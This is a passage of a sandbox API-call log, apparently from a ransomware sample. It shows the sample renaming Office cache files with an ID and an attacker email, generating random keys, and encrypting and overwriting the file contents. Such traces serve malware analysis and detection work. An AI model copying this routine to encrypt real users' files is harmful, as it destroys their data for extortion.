nNumberOfBytesToRead=0x15b5, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x15b5, lpOverlapped=0x0) returned 1 [0143.349] SetFilePointer (in: hFile=0x49c, lDistanceToMove=-5557, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.349] WriteFile (in: hFile=0x49c, lpBuffer=0x3a89d0*, nNumberOfBytesToWrite=0x15b5, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a89d0*, lpNumberOfBytesWritten=0x2acf9c8*=0x15b5, lpOverlapped=0x0) returned 1 [0143.349] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0143.349] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a89d0 | out: hHeap=0x2e0000) returned 1 [0143.349] CloseHandle (hObject=0x49c) returned 1 [0143.350] GetProcessHeap () returned 0x2e0000 [0143.350] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0143.350] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0143.350] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0143.350] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385968 | out: hHeap=0x2e0000) returned 1 [0143.350] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3858c0 | out: hHeap=0x2e0000) returned 1 [0143.350] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3858c0 [0143.350] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0143.350] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0143.350] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0143.350] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0143.350] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi", dwFileAttributes=0x80) returned 1 [0143.351] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 77 [0143.351] GetProcessHeap () returned 0x2e0000 [0143.351] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363a50 [0143.351] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" [0143.351] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0143.351] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0143.354] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0143.354] GetProcessHeap () returned 0x2e0000 [0143.354] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0143.354] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=3702272) returned 1 [0143.354] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x387e00 [0143.354] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0143.354] GetProcessHeap () returned 0x2e0000 [0143.354] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0143.354] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0143.354] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0143.356] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0143.356] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0143.356] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x387e00) returned 0x31d0020 [0143.356] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x387e00) returned 0x3560020 [0143.357] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.357] ReadFile (in: hFile=0x49c, lpBuffer=0x31d0020, nNumberOfBytesToRead=0x387e00, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x387e00, lpOverlapped=0x0) returned 1 [0143.606] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0143.606] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0143.606] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", dwFileAttributes=0x80) returned 1 [0143.607] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 76 [0143.607] GetProcessHeap () returned 0x2e0000 [0143.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0143.607] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" [0143.607] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0143.607] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0143.615] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0143.615] GetProcessHeap () returned 0x2e0000 [0143.615] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0143.615] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=14127746) returned 1 [0143.615] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xd79282 [0143.615] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0143.615] GetProcessHeap () returned 0x2e0000 [0143.616] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0143.616] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0143.616] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0143.617] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0143.617] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0143.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd79282) returned 0x31d0020 [0143.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd79282) returned 0x3f50020 [0143.619] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.619] ReadFile (in: hFile=0x49c, lpBuffer=0x31d0020, nNumberOfBytesToRead=0xd79282, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xd79282, lpOverlapped=0x0) returned 1 [0144.445] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0144.445] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0144.445] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll", dwFileAttributes=0x80) returned 1 [0144.446] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 75 [0144.446] GetProcessHeap () returned 0x2e0000 [0144.446] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363a50 [0144.446] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" [0144.446] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.12781717671972518758.ex_parvis@aol.com.AIR" [0144.446] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0144.448] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0144.449] GetProcessHeap () returned 0x2e0000 [0144.449] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0144.449] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=655872) returned 1 [0144.449] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xa0200 [0144.449] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0144.449] GetProcessHeap () returned 0x2e0000 [0144.449] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0144.449] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0144.449] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0144.451] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0144.451] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.451] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0200) returned 0x31d0020 [0144.451] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0200) returned 0x3280020 [0144.451] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.451] ReadFile (in: hFile=0x49c, lpBuffer=0x31d0020, nNumberOfBytesToRead=0xa0200, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xa0200, lpOverlapped=0x0) returned 1 [0144.479] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0144.479] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0144.479] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", dwFileAttributes=0x80) returned 1 [0144.480] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 91 [0144.480] GetProcessHeap () returned 0x2e0000 [0144.480] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x11c) returned 0x3a74d8 [0144.480] lstrcpyW (in: lpString1=0x3a74d8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" [0144.480] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.12781717671972518758.ex_parvis@aol.com.AIR" [0144.480] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0144.483] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0144.483] GetProcessHeap () returned 0x2e0000 [0144.483] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a74d8 | out: hHeap=0x2e0000) returned 1 [0144.483] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1857) returned 1 [0144.483] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x741 [0144.483] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0144.483] GetProcessHeap () returned 0x2e0000 [0144.483] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0144.483] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0144.483] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0144.485] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0144.485] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.485] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x741) returned 0x3a74d8 [0144.485] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x741) returned 0x3a7c28 [0144.485] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.485] ReadFile (in: hFile=0x49c, lpBuffer=0x3a74d8, nNumberOfBytesToRead=0x741, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a74d8*, lpNumberOfBytesRead=0x2acf9c8*=0x741, lpOverlapped=0x0) returned 1 [0144.485] SetFilePointer (in: hFile=0x49c, lDistanceToMove=-1857, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.485] WriteFile (in: hFile=0x49c, lpBuffer=0x3a7c28*, nNumberOfBytesToWrite=0x741, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7c28*, lpNumberOfBytesWritten=0x2acf9c8*=0x741, lpOverlapped=0x0) returned 1 [0144.485] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a74d8 | out: hHeap=0x2e0000) returned 1 [0144.485] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7c28 | out: hHeap=0x2e0000) returned 1 [0144.485] CloseHandle (hObject=0x49c) returned 1 [0144.488] GetProcessHeap () returned 0x2e0000 [0144.488] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0144.488] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0144.488] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0144.488] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0144.488] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0144.488] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3856c8 [0144.488] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0144.488] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0144.488] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0144.488] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0144.488] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe", dwFileAttributes=0x80) returned 1 [0144.489] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 76 [0144.489] GetProcessHeap () returned 0x2e0000 [0144.489] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0144.489] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" [0144.489] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0144.489] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0144.492] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: 